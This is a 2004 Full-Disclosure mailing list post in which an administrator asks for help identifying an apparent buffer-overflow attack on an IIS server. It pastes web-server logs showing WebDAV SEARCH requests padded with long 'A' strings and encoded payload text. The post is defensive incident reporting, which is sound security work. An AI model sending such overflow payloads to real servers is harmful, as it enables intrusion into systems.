[Full-Disclosure] Exploit Identification Request

From: System Administrator (root_at_transientimages.com)
Date: 04/29/04

  • Next message: J Wachtel: "[Full-Disclosure] Zonet ZSR1104WE Router problem" 
    To: <full-disclosure@lists.netsys.com>
Date: Thu, 29 Apr 2004 06:34:41 -0700

    Folks :

    One of our external systems (W2k, fully patched all components -
    sp4, sql sp4, mdac sp3, post hotfixes, etc) is being hit by what
    appears to be a buffer overflow of IIS : 4096 bytes cycling in
    what appears to be an attempt to execute code. The probe starts by
    obtaining an index.asp page, and then drops a "SEARCH / 411 210
    42" before dropping the "AAAAA<n>" string.

    I've checked the SEARCH unicode against google (nothing) and k-
    otic's current exploits (nada) and dsheild tables (nada).

    Can anyone assist in idenfification of the exploit\overrun attempt?

    Thanks,
    Oliver

    2004-04-28 21:12:38 x.x.88.247 GET /index.asp 200 0 189
    Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) -
    2004-04-28 21:12:38 x.x.88.247 SEARCH / 411 210 42 - -
    2004-04-28 21:12:45 x.x.88.247
    SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAA?????????????????????????????????????####??????????
    rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs
    mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd
    ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi
    kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo
    kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl
    oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm
    dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd
    dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd
    ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei
    hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrfd
    2004-04-28 21:12:51 217.185.88.247
    SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAA?????????????????????????????????????####??????????
    rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs
    mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd
    ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi
    kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo
    kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl
    oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm
    dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd
    dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd
    ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei
    hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrf
    2004-04-28 21:13:01 217.185.198.113 GET /index.asp 200 0 189
    Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) -
    2004-04-28 21:13:04 217.185.198.113 SEARCH / 411 210 42 - -
    2004-04-28 21:13:27 217.185.198.113
    SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAA?????????????????????????????????????####??????????
    rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs
    mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd
    ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi
    kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo
    kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl
    oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm
    dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd
    dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd
    ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei
    hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrf
     

     
                       

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: J Wachtel: "[Full-Disclosure] Zonet ZSR1104WE Router problem"